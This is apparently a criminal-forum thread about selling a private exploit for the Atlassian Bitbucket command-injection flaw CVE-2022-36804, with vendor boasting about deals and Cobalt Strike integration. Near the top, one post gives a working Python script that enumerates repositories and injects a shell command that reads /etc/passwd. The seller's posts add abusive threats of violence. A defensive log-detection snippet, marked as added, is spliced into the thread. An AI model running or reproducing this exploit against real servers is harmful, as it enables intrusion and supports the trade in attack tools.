Discussion of the sale of CVE-2022-36804 (Atlassian Bitbucket exploit) and other exploits

grader

Can I find out the price? My PMs are being ignored (strange)
I don't know whether this is the done thing, but
Python:
import requests
import urllib3
import sys
urllib3.disable_warnings()


def run(target):
    try:
        projects_response = requests.get("https://"+target+"/rest/api/latest/projects", verify=False).json()["values"]
        command = "cat%20/etc/passwd"
        for item in projects_response:
            project = item["key"]
            repos_response = requests.get(
                f"https://" + target + f"/rest/api/latest/projects/{project}/repos", verify=False).json()["values"]
            repos = [item["slug"] for item in repos_response]
            for repo in repos:
                if check(target, project, repo):
                    return "\033[92m[+] VULNERABLE     | " + target + " | https://" + target + "/rest/api/latest/projects/" + project + "/repos/" + repo + f"/archive?filename=aaa&path=aaa&prefix=ax%00--exec=%60{command}%60%00--remote=origin \033[0m"
        return "[-] NOT-VULNERABLE | " + target
    except:
        return "[-] NOT-VULNERABLE | " + target


def check(target, project, repo):
    try:
        command = "cat%20/etc/passwd"
        response = requests.get(
            "https://" + target + "/rest/api/latest/projects/" + project + "/repos/" + repo +
            f"/archive?filename=aaa&path=aaa&prefix=ax%00--exec=%60{command}%60%00--remote=origin", verify=False)
        resp_json = response.json()
        return "root:x" in resp_json["errors"][0]["message"]
    except:
        return False


def main():
    for target in sys.stdin:
        print(run(target.strip()))


if __name__ == "__main__":
    main()
what's wrong with this one?
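
For defenders, the request shape in the script above (a NUL byte, `%00`, followed by `--` options inside a query parameter of the repository `archive` endpoint) can be searched for in web access logs. The following is an added example, not part of the original post; the combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path of the Bitbucket REST archive endpoint, as it appears in the post's script.
ARCHIVE_PATH = re.compile(r"^/rest/api/[^/]+/projects/[^/]+/repos/[^/]+/archive$")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, placeholder command).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2023:10:00:00 +0000] "GET /rest/api/latest/projects/PRJ/repos/app/archive?format=zip&prefix=release HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2023:10:00:05 +0000] "GET /rest/api/latest/projects/PRJ/repos/app/archive?filename=aaa&path=aaa&prefix=ax%00--exec=PLACEHOLDER%00--remote=origin HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2023:10:00:06 +0000] "GET /rest/api/latest/projects HTTP/1.1" 200 900',
]


def suspicious_archive_params(url):
    """Return names of archive query parameters carrying a NUL byte or a "--option"."""
    parts = urlsplit(url)
    if not ARCHIVE_PATH.match(parts.path):
        return []
    flagged = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl percent-decodes the value, so %00 is "\x00" at this point.
        segments = value.split("\x00")
        # A NUL splits the value into extra arguments; "--" marks an injected option.
        if len(segments) > 1 or any(s.startswith("--") for s in segments):
            flagged.append(name)
    return flagged


def scan(lines):
    """Yield (line_number, flagged_parameters) for each suspicious log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            flagged = suspicious_archive_params(match.group(1))
            if flagged:
                yield number, flagged


if __name__ == "__main__":
    for number, params in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious archive parameter(s): {', '.join(params)}")
```
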
 
Thanks for the reply about implementations. Now I know u write GUI stable version which can be useful for Cobalt Strike users. Wish: Don't forget to write about it because otherwise it looks like you are selling already public shit.
 
Actual.

I see there are very dumb motherfuckers in general who don't understand that there is a big difference between what is in public and what is a private implementation of an exploit. Actually the existence of such dumb motherfuckers is meaningless! The scum is commenting here and there on the forum, mentioning my account and threads - such scum when I find in real life is exterminated!

Exploits are private implementations. Come through a private tool. Also with GUI for convenience.

I have $200K+ deals only with the Garant on Exploit which is only a very small part of actual deals as most deals are direct - but I mention only this $200K because it is documented and can be checked. All my tools are private, high-quality tools used by legitimate red teams.

Contact with PM.
 
I don't understand, you don't sell public exploit?
I saw the same exploits on GitHub.
Or you find other vulnerabilities?
Can you explain more?
 
Can you explain more?
for example (sorry TS):
Public code:
Python:
print("Hello world")
Priv8 Implementation by johndoe7
Python:
from threading import Thread

a = 'l'
b = 'o'
c = 'He' + a*2 + b
d = 'W' + b + 'r' + a + 'd'

def print_impl(string: str) -> None:
    print('[' + '=' * 17 + ']')
    print('[AMAZING PRIV8 GUI]')
    print('[CO-CO-BLAT STRIKE]')
    print('[' + '=' * 17 + ']')
    print(string.center(19))
    print('[' + '=' * 17 + ']')
    print('[200k MUTHAFUCKERS]')
    print('[' + '=' * 17 + ']')

Thread(
    target=print_impl, 
    args=(f'{c} {d}',)
).start()
 
Fucking trash! Are there no moderators in this forum to remove this retarded trash?

I say that I have $200K+ deals with the Exploit Garant (something that can always be checked with the Garant there) and the retarded clown pours the shit that I have $200K dep - that's called a retarded clown! In real life such scum perishes! Trash!

Clowns - some of them 10+ years on these forums and still cannot earn even $1K! Go all over the forum and pour the shit that you can find everything in the public domain! Like for something you can maybe Google 6 hours and ultimately find how to do it or buy it with $1K already done - and in the next 6 hours I can make $10K! Retarded clowns will go and pour the shit that they are so smart to have saved $1K! - but ultimately they are totally incapable of earning something!

took the public ones, bolted on a GUI. ta-da)
What fucking scum?! GUI is actually quite important - ask why there exists something like Metasploit Pro! But these clowns don't know because they have never actually got to the point of actual work and making money. Everyone who actually does something knows very well how important time is and the ability to focus on the important things and see the whole picture and not lose time and got asleep but get things done!

As for this thread: people receive EXACTLY what is explained in the thread, nothing is hidden or exaggerated. And I have a lot of deals on the Exploit forum and some here and never had a problem with someone who bought. The exploits are private - private implementations, not public code - and stupid shit that doesn't understand the difference that alternative implementations make, well they are just stupid shit! Any normal person who works with these things can remember how people were seeking different implementations of the Bluekeep exploit for example - and there were at least two popular alternatives - from Metasploit and from Immunity CANVAS - and people were searching hard for the CANVAS alternative! Also the exploits come with GUI and other options that make it convenient to work - for example the ability to pass easily sessions to and from Cobalt Strike, and many others as well. Fucking scum! - what super-duper I say? What? What I explain in this thread is exactly what people receive when they buy! Fucking trash!
 

